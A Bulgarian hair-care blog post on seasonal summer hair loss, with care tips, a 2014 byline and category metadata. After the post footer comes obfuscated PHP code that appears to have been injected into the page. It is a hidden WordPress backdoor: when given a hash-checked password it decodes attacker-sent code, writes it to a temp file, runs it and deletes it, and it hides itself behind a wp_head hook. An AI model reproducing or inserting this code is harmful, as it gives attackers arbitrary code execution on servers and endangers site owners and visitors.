Има ли летен косопад | Косопад

Има ли летен косопад

kosa-plaj

Косата изисква постоянни грижи. Особено през лятото, когато обикновено остава незащитена и отделяме по- малко време за нея. Не трябва да бъркаме физиологичния косопад, който обикновено се случва в периода юни- ноември, с алопецията. Това е сезонен косопад, който е част от нормалния цикъл на косата.

Различните косми по главата ни се намират в различни етапи на развитието си. Понякога сезонният косопад е минимален, Но на 4- 5 години има усилена смяна на косата.

В периода от юни до ноември обикновено имаме усилен косопад, който може да е доста застрашителен. Важното е да има баланс между косата, която губите, и косата, която се ражда. В края на лятото обикновено цикълът на косопада е най- силен.

kosa-lqto

Ето няколко полезни съвета как да се грижим за косата:

– Солената вода и дългото излагане на слънце увреждат косата, затова трябва да полагаме много добра хигиена.
– Ако косата ви е мазна или имате пърхот, мийте я всеки ден.
– Косопадът в периода юни- ноември обикновено се приема за нещо нормално.
– Ако обаче продължава усилено и извън този период, потърсете мнението на лекар.
– Дължината на косата не определя косопада.
– Сешоарът, пресата, спрейовете, гелът допринасят за косопада, но обикновено не са основната причина за него.
– Пазете косата през лятото с шапки, кърпи и пр. Мит е, че от тях се оплешивява. Разбира се, важно е да проветрявате косата, но когато вече не сте изложени на пряка слънчева светлина.

22. юни 2014 17:25:03 от Надя Колева
Категории: Любопитно за косопада | Етикети: , , | 14 коментари

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}